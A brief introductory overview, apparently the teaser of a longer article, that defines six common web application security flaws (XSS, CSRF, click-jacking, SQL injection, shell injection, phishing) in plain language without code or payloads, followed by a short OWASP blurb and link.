Common Security Mistakes in Web Applications

Common Security Mistakes in Web Applications
1. Cross-site scripting (XSS)
Cross-site scripting is an attack in which a user is tricked into executing code from an attacker’s site (say evil.com) in the context of our website (let’s call it www.mybiz.com).
2. Cross-site request forgery (CSRF)
CSRF (sometimes abbreviated as XSRF) is an attack where a malicious site tricks our visitors into carrying out an action on our site.
3. Click-jacking

4. SQL injection
In this kind of an attack, the attacker exploits insufficient input validation to gain shell access on your database server
5. Shell injection
Similar to SQL injection, the attacker tries to craft an input string to gain shell access to your web server. Once they have shell access, they could potentially do a lot more. Depending on access privileges, they could add JavaScript to your HTML pages, or gain access to other internal systems on your network
6. Phishing
Phishing is the process where an attacker tricks your users into handing over their login credentials. The attacker may create a page that looks exactly like your login page, and ask the user to log in there by sending them a link via e-mail, IM, Facebook, or something similar.
Click here to read the whole article

The Open Web Application Security Project (OWASP) is a 501c3 not-for-profit worldwide charitable organization focused on improving the security of application software.
http://www.owasp.org/index.php/Main_Page